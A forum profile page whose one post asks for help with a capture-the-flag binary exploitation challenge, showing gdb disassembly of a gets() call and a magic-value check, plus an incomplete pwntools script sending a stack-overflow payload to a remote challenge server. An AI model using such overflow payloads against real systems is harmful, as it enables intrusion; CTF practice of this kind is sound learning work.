Jump to content

inspectorderick

Members
  • Posts

    1
  • Joined

  • Last visited

Recent Profile Visitors

The recent visitors block is disabled and is not being shown to other users.

inspectorderick's Achievements

Newbie

Newbie (1/14)

0

Reputation

  1. Hello i've a problem to solve, a binary exploitation this is my output gdb 0x004008a6 <+301>: lea eax,[ebp-0x3b]0x004008a9 <+304>: push eax0x004008aa <+305>: call 0x400520 <gets@plt>0x004008af <+310>: add esp,0x100x004008b2 <+313>: cmp DWORD PTR [ebp-0x10],0xdea110c80x004008b9 <+320>: jne 0x4008c2 <main+329>0x004008bb <+322>: call 0x4006fd <print_flag>0x004008c0 <+327>: jmp 0x4008d4 <main+347> this is my program in python from pwn import *r = remote("***************.com", 4321)payload = "A"*i + "\xc8\x10\xa1\xde"r.send("Sir Lancelot of Camelot\n")print r.recv(4096)r.send("To seek the Holy Grail.\n")print r.recv(4096)r.send(payload)print r.recv(4096) My goal is to jump the comparaison to access the function witch print the flag some advise or help are welcome thanks
×
×
  • Create New...